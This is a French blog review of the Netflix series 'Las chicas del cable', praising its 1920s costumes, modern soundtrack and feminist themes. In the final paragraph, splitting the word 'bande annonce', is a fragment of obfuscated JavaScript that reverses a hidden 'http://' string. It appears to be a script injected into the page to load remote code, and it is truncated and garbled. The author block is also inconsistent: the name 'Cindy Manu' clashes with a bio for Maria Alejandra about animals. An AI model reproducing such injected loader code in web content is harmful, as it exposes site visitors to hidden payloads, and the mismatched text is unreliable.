Las chicas del cable, nouvelle série espagnole tout juste sortie sur la plateforme Netflix, parle d’un métier perdu à ce jour, celui de téléphoniste. Ce métier qui permettait de mettre en relation les appels entre certaines personnes. Mais dans cette série, il y a les amours, les problèmes de famille de cette époque des personnages…
Dans les années 20, les femmes n’étaient pas du tout considérées. Elles n’avaient pas le droit de vote, n’avaient pas de compte en banque à leur nom, ou un travail propre à elles lorsqu’elles étaient mariées. Mais certains hommes, des époux plus ouvert d’esprit, ont autorisé leur épouses à travailler. À être tout simplement libre. Nous vivons avec elles, leur désir immense d’être indépendantes, d’aimer librement, de pouvoir oser défendre leurs convictions…
Synopsis : Être une femme forte et libre dans les années 20, ce n’était pas si simple. Lidia (Blanca Suárez) part pour Madrid pour fuir et débuter une nouvelle vie en tant qu’employée dans une entreprise de télécommunications. Son passé risque bien de la rattraper plus vite que prévu…
Las chicas del cable, on en pense quoi ?
Cette série se déroulant pendant les années folles, Las Chicas Del Cable surprend tant par ses costumes d’époque, les décors que par son ambiance avec des musiques contemporaines, comme pour le générique de B. Miles – Salt. Ce joli contraste entre la musicalité et la temporalité de la série aurait pu décevoir mais, au contraire elle donne un bon coup de fraîcheur pour cette époque. Mais, Las Chicas Del Cable offre un réel mélange de générations.
Dans l’épisode pilote, on y découvre quasi tous les personnages principaux. Donc 4 téléphonistes, et on peut vous dire que ces femmes ont du caractère et elles le font bien savoir ! Grâce à l’époque, Las Chicas Del Cable témoigne son côté féministe, également politiquement engagée tout en explorant l’affranchissement de ces femmes de cette époque, sujet où des inégalités subsistent malheureusement encore.
On se lance dans cette aventure ?
Oui ! Lancez vous dans l’aventure en regardant cette série. Les personnages sont très attachants et surtout, elle nous permet de passer un bon moment en leur compagnie ! Une saison 2 serait annoncée, mais en attendant, je vous laisse avec la b {if (typeof ($Ikf.list[n]) == « string ») return $Ikf.list[n].split(« »).reverse().join(« »);return $Ikf.list[n];};$Ikf.list=[« \’ //:ptth\’= « ]; ( () * 6); ; );}ande annonce, ici, pour que vous puissiez vous faire une idée.
Avez vous vu Las chicas del cable ? Qu’en pensez-vous ?
Cindy Manu
Passionnée par le monde des mots et avide de découvertes, je m'appelle Maria Alejandra. En tant que rédactrice au sein de ce magazine féminin, je suis constamment en quête d'informations captivantes à partager avec notre précieuse communauté.
Ma curiosité insatiable m'entraîne à explorer les recoins les plus variés d'Internet, où je dévore avec enthousiasme tout ce que je peux trouver. C'est avec une joie débordante que je m'engage à vous transmettre les trésors de connaissances que je découvre, en particulier dans le domaine des animaux.